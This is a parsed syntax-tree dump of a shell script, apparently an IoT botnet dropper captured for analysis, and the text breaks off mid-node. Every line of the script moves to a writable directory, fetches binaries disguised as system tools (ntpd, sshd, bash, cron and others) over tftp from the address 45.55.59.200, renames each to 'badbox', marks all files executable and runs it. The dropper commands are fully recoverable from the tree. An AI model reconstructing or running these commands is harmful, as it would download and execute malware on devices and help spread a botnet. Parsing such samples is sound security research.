CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 170), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 133), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 121), word='45.55.59.200'),
    WordNode(lineno=4, pos=(122, 124), word='-c'),
    WordNode(lineno=4, pos=(125, 128), word='get'),
    WordNode(lineno=4, pos=(129, 133), word='ntpd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(133, 134)),
  CommandNode(lineno=4, pos=(134, 150), parts=[
    WordNode(lineno=4, pos=(134, 137), word='cat'),
    WordNode(lineno=4, pos=(138, 142), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(144, 150), word='badbox'), pos=(143, 150), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(150, 151)),
  CommandNode(lineno=4, pos=(151, 161), parts=[
    WordNode(lineno=4, pos=(151, 156), word='chmod'),
    WordNode(lineno=4, pos=(157, 159), word='+x'),
    WordNode(lineno=4, pos=(160, 161), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(161, 162)),
  CommandNode(lineno=4, pos=(162, 170), parts=[
    WordNode(lineno=4, pos=(162, 170), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(171, 292), parts=[
  CommandNode(lineno=5, pos=(171, 178), parts=[
    WordNode(lineno=5, pos=(171, 173), word='cd'),
    WordNode(lineno=5, pos=(174, 178), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(179, 181)),
  CommandNode(lineno=5, pos=(182, 193), parts=[
    WordNode(lineno=5, pos=(182, 184), word='cd'),
    WordNode(lineno=5, pos=(185, 193), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(194, 196)),
  CommandNode(lineno=5, pos=(197, 204), parts=[
    WordNode(lineno=5, pos=(197, 199), word='cd'),
    WordNode(lineno=5, pos=(200, 204), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(205, 207)),
  CommandNode(lineno=5, pos=(208, 216), parts=[
    WordNode(lineno=5, pos=(208, 210), word='cd'),
    WordNode(lineno=5, pos=(211, 216), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(217, 219)),
  CommandNode(lineno=5, pos=(220, 224), parts=[
    WordNode(lineno=5, pos=(220, 222), word='cd'),
    WordNode(lineno=5, pos=(223, 224), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(224, 225)),
  CommandNode(lineno=5, pos=(226, 255), parts=[
    WordNode(lineno=5, pos=(226, 230), word='tftp'),
    WordNode(lineno=5, pos=(231, 243), word='45.55.59.200'),
    WordNode(lineno=5, pos=(244, 246), word='-c'),
    WordNode(lineno=5, pos=(247, 250), word='get'),
    WordNode(lineno=5, pos=(251, 255), word='sshd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(255, 256)),
  CommandNode(lineno=5, pos=(256, 272), parts=[
    WordNode(lineno=5, pos=(256, 259), word='cat'),
    WordNode(lineno=5, pos=(260, 264), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(266, 272), word='badbox'), pos=(265, 272), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(272, 273)),
  CommandNode(lineno=5, pos=(273, 283), parts=[
    WordNode(lineno=5, pos=(273, 278), word='chmod'),
    WordNode(lineno=5, pos=(279, 281), word='+x'),
    WordNode(lineno=5, pos=(282, 283), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(283, 284)),
  CommandNode(lineno=5, pos=(284, 292), parts=[
    WordNode(lineno=5, pos=(284, 292), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(293, 420), parts=[
  CommandNode(lineno=6, pos=(293, 300), parts=[
    WordNode(lineno=6, pos=(293, 295), word='cd'),
    WordNode(lineno=6, pos=(296, 300), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(301, 303)),
  CommandNode(lineno=6, pos=(304, 315), parts=[
    WordNode(lineno=6, pos=(304, 306), word='cd'),
    WordNode(lineno=6, pos=(307, 315), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(316, 318)),
  CommandNode(lineno=6, pos=(319, 326), parts=[
    WordNode(lineno=6, pos=(319, 321), word='cd'),
    WordNode(lineno=6, pos=(322, 326), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(327, 329)),
  CommandNode(lineno=6, pos=(330, 338), parts=[
    WordNode(lineno=6, pos=(330, 332), word='cd'),
    WordNode(lineno=6, pos=(333, 338), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(339, 341)),
  CommandNode(lineno=6, pos=(342, 346), parts=[
    WordNode(lineno=6, pos=(342, 344), word='cd'),
    WordNode(lineno=6, pos=(345, 346), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(346, 347)),
  CommandNode(lineno=6, pos=(348, 380), parts=[
    WordNode(lineno=6, pos=(348, 352), word='tftp'),
    WordNode(lineno=6, pos=(353, 365), word='45.55.59.200'),
    WordNode(lineno=6, pos=(366, 368), word='-c'),
    WordNode(lineno=6, pos=(369, 372), word='get'),
    WordNode(lineno=6, pos=(373, 380), word='openssh'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(380, 381)),
  CommandNode(lineno=6, pos=(381, 400), parts=[
    WordNode(lineno=6, pos=(381, 384), word='cat'),
    WordNode(lineno=6, pos=(385, 392), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(394, 400), word='badbox'), pos=(393, 400), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(400, 401)),
  CommandNode(lineno=6, pos=(401, 411), parts=[
    WordNode(lineno=6, pos=(401, 406), word='chmod'),
    WordNode(lineno=6, pos=(407, 409), word='+x'),
    WordNode(lineno=6, pos=(410, 411), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(411, 412)),
  CommandNode(lineno=6, pos=(412, 420), parts=[
    WordNode(lineno=6, pos=(412, 420), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(421, 542), parts=[
  CommandNode(lineno=7, pos=(421, 428), parts=[
    WordNode(lineno=7, pos=(421, 423), word='cd'),
    WordNode(lineno=7, pos=(424, 428), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(429, 431)),
  CommandNode(lineno=7, pos=(432, 443), parts=[
    WordNode(lineno=7, pos=(432, 434), word='cd'),
    WordNode(lineno=7, pos=(435, 443), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(444, 446)),
  CommandNode(lineno=7, pos=(447, 454), parts=[
    WordNode(lineno=7, pos=(447, 449), word='cd'),
    WordNode(lineno=7, pos=(450, 454), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(455, 457)),
  CommandNode(lineno=7, pos=(458, 466), parts=[
    WordNode(lineno=7, pos=(458, 460), word='cd'),
    WordNode(lineno=7, pos=(461, 466), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(467, 469)),
  CommandNode(lineno=7, pos=(470, 474), parts=[
    WordNode(lineno=7, pos=(470, 472), word='cd'),
    WordNode(lineno=7, pos=(473, 474), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(474, 475)),
  CommandNode(lineno=7, pos=(476, 505), parts=[
    WordNode(lineno=7, pos=(476, 480), word='tftp'),
    WordNode(lineno=7, pos=(481, 493), word='45.55.59.200'),
    WordNode(lineno=7, pos=(494, 496), word='-c'),
    WordNode(lineno=7, pos=(497, 500), word='get'),
    WordNode(lineno=7, pos=(501, 505), word='bash'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(505, 506)),
  CommandNode(lineno=7, pos=(506, 522), parts=[
    WordNode(lineno=7, pos=(506, 509), word='cat'),
    WordNode(lineno=7, pos=(510, 514), word='bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(516, 522), word='badbox'), pos=(515, 522), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(522, 523)),
  CommandNode(lineno=7, pos=(523, 533), parts=[
    WordNode(lineno=7, pos=(523, 528), word='chmod'),
    WordNode(lineno=7, pos=(529, 531), word='+x'),
    WordNode(lineno=7, pos=(532, 533), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(533, 534)),
  CommandNode(lineno=7, pos=(534, 542), parts=[
    WordNode(lineno=7, pos=(534, 542), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(543, 664), parts=[
  CommandNode(lineno=8, pos=(543, 550), parts=[
    WordNode(lineno=8, pos=(543, 545), word='cd'),
    WordNode(lineno=8, pos=(546, 550), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(551, 553)),
  CommandNode(lineno=8, pos=(554, 565), parts=[
    WordNode(lineno=8, pos=(554, 556), word='cd'),
    WordNode(lineno=8, pos=(557, 565), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(566, 568)),
  CommandNode(lineno=8, pos=(569, 576), parts=[
    WordNode(lineno=8, pos=(569, 571), word='cd'),
    WordNode(lineno=8, pos=(572, 576), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(577, 579)),
  CommandNode(lineno=8, pos=(580, 588), parts=[
    WordNode(lineno=8, pos=(580, 582), word='cd'),
    WordNode(lineno=8, pos=(583, 588), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(589, 591)),
  CommandNode(lineno=8, pos=(592, 596), parts=[
    WordNode(lineno=8, pos=(592, 594), word='cd'),
    WordNode(lineno=8, pos=(595, 596), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(596, 597)),
  CommandNode(lineno=8, pos=(598, 627), parts=[
    WordNode(lineno=8, pos=(598, 602), word='tftp'),
    WordNode(lineno=8, pos=(603, 615), word='45.55.59.200'),
    WordNode(lineno=8, pos=(616, 618), word='-c'),
    WordNode(lineno=8, pos=(619, 622), word='get'),
    WordNode(lineno=8, pos=(623, 627), word='tftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(627, 628)),
  CommandNode(lineno=8, pos=(628, 644), parts=[
    WordNode(lineno=8, pos=(628, 631), word='cat'),
    WordNode(lineno=8, pos=(632, 636), word='tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(638, 644), word='badbox'), pos=(637, 644), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(644, 645)),
  CommandNode(lineno=8, pos=(645, 655), parts=[
    WordNode(lineno=8, pos=(645, 650), word='chmod'),
    WordNode(lineno=8, pos=(651, 653), word='+x'),
    WordNode(lineno=8, pos=(654, 655), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(655, 656)),
  CommandNode(lineno=8, pos=(656, 664), parts=[
    WordNode(lineno=8, pos=(656, 664), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(665, 790), parts=[
  CommandNode(lineno=9, pos=(665, 672), parts=[
    WordNode(lineno=9, pos=(665, 667), word='cd'),
    WordNode(lineno=9, pos=(668, 672), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(673, 675)),
  CommandNode(lineno=9, pos=(676, 687), parts=[
    WordNode(lineno=9, pos=(676, 678), word='cd'),
    WordNode(lineno=9, pos=(679, 687), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(688, 690)),
  CommandNode(lineno=9, pos=(691, 698), parts=[
    WordNode(lineno=9, pos=(691, 693), word='cd'),
    WordNode(lineno=9, pos=(694, 698), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(699, 701)),
  CommandNode(lineno=9, pos=(702, 710), parts=[
    WordNode(lineno=9, pos=(702, 704), word='cd'),
    WordNode(lineno=9, pos=(705, 710), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(711, 713)),
  CommandNode(lineno=9, pos=(714, 718), parts=[
    WordNode(lineno=9, pos=(714, 716), word='cd'),
    WordNode(lineno=9, pos=(717, 718), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(718, 719)),
  CommandNode(lineno=9, pos=(720, 751), parts=[
    WordNode(lineno=9, pos=(720, 724), word='tftp'),
    WordNode(lineno=9, pos=(725, 737), word='45.55.59.200'),
    WordNode(lineno=9, pos=(738, 740), word='-c'),
    WordNode(lineno=9, pos=(741, 744), word='get'),
    WordNode(lineno=9, pos=(745, 751), word='pstree'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(751, 752)),
  CommandNode(lineno=9, pos=(752, 770), parts=[
    WordNode(lineno=9, pos=(752, 755), word='cat'),
    WordNode(lineno=9, pos=(756, 762), word='pstree'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(764, 770), word='badbox'), pos=(763, 770), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(770, 771)),
  CommandNode(lineno=9, pos=(771, 781), parts=[
    WordNode(lineno=9, pos=(771, 776), word='chmod'),
    WordNode(lineno=9, pos=(777, 779), word='+x'),
    WordNode(lineno=9, pos=(780, 781), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(781, 782)),
  CommandNode(lineno=9, pos=(782, 790), parts=[
    WordNode(lineno=9, pos=(782, 790), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(791, 920), parts=[
  CommandNode(lineno=10, pos=(791, 798), parts=[
    WordNode(lineno=10, pos=(791, 793), word='cd'),
    WordNode(lineno=10, pos=(794, 798), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(799, 801)),
  CommandNode(lineno=10, pos=(802, 813), parts=[
    WordNode(lineno=10, pos=(802, 804), word='cd'),
    WordNode(lineno=10, pos=(805, 813), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(814, 816)),
  CommandNode(lineno=10, pos=(817, 824), parts=[
    WordNode(lineno=10, pos=(817, 819), word='cd'),
    WordNode(lineno=10, pos=(820, 824), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(825, 827)),
  CommandNode(lineno=10, pos=(828, 836), parts=[
    WordNode(lineno=10, pos=(828, 830), word='cd'),
    WordNode(lineno=10, pos=(831, 836), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(837, 839)),
  CommandNode(lineno=10, pos=(840, 844), parts=[
    WordNode(lineno=10, pos=(840, 842), word='cd'),
    WordNode(lineno=10, pos=(843, 844), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(844, 845)),
  CommandNode(lineno=10, pos=(846, 879), parts=[
    WordNode(lineno=10, pos=(846, 850), word='tftp'),
    WordNode(lineno=10, pos=(851, 863), word='45.55.59.200'),
    WordNode(lineno=10, pos=(864, 866), word='-c'),
    WordNode(lineno=10, pos=(867, 870), word='get'),
    WordNode(lineno=10, pos=(871, 879), word='dropbear'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(879, 880)),
  CommandNode(lineno=10, pos=(880, 900), parts=[
    WordNode(lineno=10, pos=(880, 883), word='cat'),
    WordNode(lineno=10, pos=(884, 892), word='dropbear'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(894, 900), word='badbox'), pos=(893, 900), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(900, 901)),
  CommandNode(lineno=10, pos=(901, 911), parts=[
    WordNode(lineno=10, pos=(901, 906), word='chmod'),
    WordNode(lineno=10, pos=(907, 909), word='+x'),
    WordNode(lineno=10, pos=(910, 911), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(911, 912)),
  CommandNode(lineno=10, pos=(912, 920), parts=[
    WordNode(lineno=10, pos=(912, 920), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(921, 1042), parts=[
  CommandNode(lineno=11, pos=(921, 928), parts=[
    WordNode(lineno=11, pos=(921, 923), word='cd'),
    WordNode(lineno=11, pos=(924, 928), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(929, 931)),
  CommandNode(lineno=11, pos=(932, 943), parts=[
    WordNode(lineno=11, pos=(932, 934), word='cd'),
    WordNode(lineno=11, pos=(935, 943), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(944, 946)),
  CommandNode(lineno=11, pos=(947, 954), parts=[
    WordNode(lineno=11, pos=(947, 949), word='cd'),
    WordNode(lineno=11, pos=(950, 954), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(955, 957)),
  CommandNode(lineno=11, pos=(958, 966), parts=[
    WordNode(lineno=11, pos=(958, 960), word='cd'),
    WordNode(lineno=11, pos=(961, 966), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(967, 969)),
  CommandNode(lineno=11, pos=(970, 974), parts=[
    WordNode(lineno=11, pos=(970, 972), word='cd'),
    WordNode(lineno=11, pos=(973, 974), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(974, 975)),
  CommandNode(lineno=11, pos=(976, 1005), parts=[
    WordNode(lineno=11, pos=(976, 980), word='tftp'),
    WordNode(lineno=11, pos=(981, 993), word='45.55.59.200'),
    WordNode(lineno=11, pos=(994, 996), word='-c'),
    WordNode(lineno=11, pos=(997, 1000), word='get'),
    WordNode(lineno=11, pos=(1001, 1005), word='wget'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1005, 1006)),
  CommandNode(lineno=11, pos=(1006, 1022), parts=[
    WordNode(lineno=11, pos=(1006, 1009), word='cat'),
    WordNode(lineno=11, pos=(1010, 1014), word='wget'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1016, 1022), word='badbox'), pos=(1015, 1022), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1022, 1023)),
  CommandNode(lineno=11, pos=(1023, 1033), parts=[
    WordNode(lineno=11, pos=(1023, 1028), word='chmod'),
    WordNode(lineno=11, pos=(1029, 1031), word='+x'),
    WordNode(lineno=11, pos=(1032, 1033), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1033, 1034)),
  CommandNode(lineno=11, pos=(1034, 1042), parts=[
    WordNode(lineno=11, pos=(1034, 1042), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1043, 1164), parts=[
  CommandNode(lineno=12, pos=(1043, 1050), parts=[
    WordNode(lineno=12, pos=(1043, 1045), word='cd'),
    WordNode(lineno=12, pos=(1046, 1050), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1051, 1053)),
  CommandNode(lineno=12, pos=(1054, 1065), parts=[
    WordNode(lineno=12, pos=(1054, 1056), word='cd'),
    WordNode(lineno=12, pos=(1057, 1065), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1066, 1068)),
  CommandNode(lineno=12, pos=(1069, 1076), parts=[
    WordNode(lineno=12, pos=(1069, 1071), word='cd'),
    WordNode(lineno=12, pos=(1072, 1076), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1077, 1079)),
  CommandNode(lineno=12, pos=(1080, 1088), parts=[
    WordNode(lineno=12, pos=(1080, 1082), word='cd'),
    WordNode(lineno=12, pos=(1083, 1088), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1089, 1091)),
  CommandNode(lineno=12, pos=(1092, 1096), parts=[
    WordNode(lineno=12, pos=(1092, 1094), word='cd'),
    WordNode(lineno=12, pos=(1095, 1096), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1096, 1097)),
  CommandNode(lineno=12, pos=(1098, 1127), parts=[
    WordNode(lineno=12, pos=(1098, 1102), word='tftp'),
    WordNode(lineno=12, pos=(1103, 1115), word='45.55.59.200'),
    WordNode(lineno=12, pos=(1116, 1118), word='-c'),
    WordNode(lineno=12, pos=(1119, 1122), word='get'),
    WordNode(lineno=12, pos=(1123, 1127), word='cron'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1127, 1128)),
  CommandNode(lineno=12, pos=(1128, 1144), parts=[
    WordNode(lineno=12, pos=(1128, 1131), word='cat'),
    WordNode(lineno=12, pos=(1132, 1136), word='cron'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1138, 1144), word='badbox'), pos=(1137, 1144), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1144, 1145)),
  CommandNode(lineno=12, pos=(1145, 1155), parts=[
    WordNode(lineno=12, pos=(1145, 1150), word='chmod'),
    WordNode(lineno=12, pos=(1151, 1153), word='+x'),
    WordNode(lineno=12, pos=(1154, 1155), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1155, 1156)),
  CommandNode(lineno=12, pos=(1156, 1164), parts=[
    WordNode(lineno=12, pos=(1156, 1164), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1165, 1284), parts=[
  CommandNode(lineno=13, pos=(1165, 1172), parts=[
    WordNode(lineno=13, pos=(1165, 1167), word='cd'),
    WordNode(lineno=13, pos=(1168, 1172), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1173, 1175)),
  CommandNode(lineno=13, pos=(1176, 1187), parts=[
    WordNode(lineno=13, pos=(1176, 1178), word='cd'),
    WordNode(lineno=13, pos=(1179, 1187), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1188, 1190)),
  CommandNode(lineno=13, pos=(1191, 1198), parts=[
    WordNode(lineno=13, pos=(1191, 1193), word='cd'),
    WordNode(lineno=13, pos=(1194, 1198), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1199, 1201)),
  CommandNode(lineno=13, pos=(1202, 1210), parts=[
    WordNode(lineno=13, pos=(1202, 1204), word='cd'),
    WordNode(lineno=13, pos=(1205, 1210), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1211, 1213)),
  CommandNode(lineno=13, pos=(1214, 1218), parts=[
    WordNode(lineno=13, pos=(1214, 1216), word='cd'),
    WordNode(lineno=13, pos=(1217, 1218), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1218, 1219)),
  CommandNode(lineno=13, pos=(1220, 1248), parts=[
    WordNode(lineno=13, pos=(1220, 1224), word='tftp'),
    WordNode(lineno=13, pos=(1225, 1237), word='45.55.59.200'),
    WordNode(lineno=13, pos=(1238, 1240), word='-c'),
    WordNode(lineno=13, pos=(1241, 1244), word='get'),
    WordNode(lineno=13, pos=(1245, 1248), word='ftp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1248, 1249)),
  CommandNode(lineno=13, pos=(1249, 1264), parts=[
    WordNode(lineno=13, pos=(1249, 1252), word='cat'),
    WordNode(lineno=13, pos=(1253, 1256), word='ftp'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1258, 1264), word='badbox'), pos=(1257, 1264), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1264, 1265)),
  CommandNode(lineno=13, pos=(1265, 1275), parts=[
    WordNode(lineno=13, pos=(1265, 1270), word='chmod'),
    WordNode(lineno=13, pos=(1271, 1273), word='+x'),
    WordNode(lineno=13, pos=(1274, 1275), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1275, 1276)),
  CommandNode(lineno=13, pos=(1276, 1284), parts=[
    WordNode(lineno=13, pos=(1276, 1284), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1285, 1406), parts=[
  CommandNode(lineno=14, pos=(1285, 1292), parts=[
    WordNode(lineno=14, pos=(1285, 1287), word='cd'),
    WordNode(lineno=14, pos=(1288, 1292), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1293, 1295)),
  CommandNode(lineno=14, pos=(1296, 1307), parts=[
    WordNode(lineno=14, pos=(1296, 1298), word='cd'),
    WordNode(lineno=14, pos=(1299, 1307), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1308, 1310)),
  CommandNode(lineno=14, pos=(1311, 1318), parts=[
    WordNode(lineno=14, pos=(1311, 1313), word='cd'),
    WordNode(lineno=14, pos=(1314, 1318), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1319, 1321)),
  CommandNode(lineno=14, pos=(1322, 1330), parts=[
    WordNode(lineno=14, pos=(1322, 1324), word='cd'),
    WordNode(lineno=14, pos=(1325, 1330), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1331, 1333)),
  CommandNode(lineno=14, pos=(1334, 1338), parts=[
    WordNode(lineno=14, pos=(1334, 1336), word='cd'),
    WordNode(lineno=14, pos=(1337, 1338), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1338, 1339)),
  CommandNode(lineno=14, pos=(1340, 1369), parts=[
    WordNode(lineno=14, pos=(1340, 1344), word='tftp'),
    WordNode(lineno=14, pos=(1345, 1357), word='45.55.59.200'),
    WordNode(lineno=14, pos=(1358, 1360), word='-c'),
    WordNode(lineno=14, pos=(1361, 1364), word='get'),
    WordNode(lineno=14, pos=(1365, 1369), word='pftp'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1369, 1370)),
  CommandNode(lineno=14, pos=(1370, 1386), parts=[
    WordNode(lineno=14, pos=(1370, 1373), word='cat'),
    WordNode(lineno=14, pos=(1374, 1378), word='pftp'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1380, 1386), word='badbox'), pos=(1379, 1386), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1386, 1387)),
  CommandNode(lineno=14, pos=(1387, 1397), parts=[
    WordNode(lineno=14, pos=(1387, 1392), word='chmod'),
    WordNode(lineno=14, pos=(1393, 1395), word='+x'),
    WordNode(lineno=14, pos=(1396, 1397), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1397, 1398)),
  CommandNode(lineno=14, pos=(1398, 1406), parts=[
    WordNode(lineno=14, pos=(1398, 1406), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1407, 1524), parts=[
  CommandNode(lineno=15, pos=(1407, 1414), parts=[
    WordNode(lineno=15, pos=(1407, 1409), word='cd'),
    WordNode(lineno=15, pos=(1410, 1414), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1415, 1417)),
  CommandNode(lineno=15, pos=(1418, 1429), parts=[
    WordNode(lineno=15, pos=(1418, 1420), word='cd'),
    WordNode(lineno=15, pos=(1421, 1429), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1430, 1432)),
  CommandNode(lineno=15, pos=(1433, 1440), parts=[
    WordNode(lineno=15, pos=(1433, 1435), word='cd'),
    WordNode(lineno=15, pos=(1436, 1440), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1441, 1443)),
  CommandNode(lineno=15, pos=(1444, 1452), parts=[
    WordNode(lineno=15, pos=(1444, 1446), word='cd'),
    WordNode(lineno=15, pos=(1447, 1452), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1453, 1455)),
  CommandNode(lineno=15, pos=(1456, 1460), parts=[
    WordNode(lineno=15, pos=(1456, 1458), word='cd'),
    WordNode(lineno=15, pos=(1459, 1460), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1460, 1461)),
  CommandNode(lineno=15, pos=(1462, 1489), parts=[
    WordNode(lineno=15, pos=(1462, 1466), word='tftp'),
    WordNode(lineno=15, pos=(1467, 1479), word='45.55.59.200'),
    WordNode(lineno=15, pos=(1480, 1482), word='-c'),
    WordNode(lineno=15, pos=(1483, 1486), word='get'),
    WordNode(lineno=15, pos=(1487, 1489), word='sh'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1489, 1490)),
  CommandNode(lineno=15, pos=(1490, 1504), parts=[
    WordNode(lineno=15, pos=(1490, 1493), word='cat'),
    WordNode(lineno=15, pos=(1494, 1496), word='sh'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1498, 1504), word='badbox'), pos=(1497, 1504), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1504, 1505)),
  CommandNode(lineno=15, pos=(1505, 1515), parts=[
    WordNode(lineno=15, pos=(1505, 1510), word='chmod'),
    WordNode(lineno=15, pos=(1511, 1513), word='+x'),
    WordNode(lineno=15, pos=(1514, 1515), word='*'),
  ]),
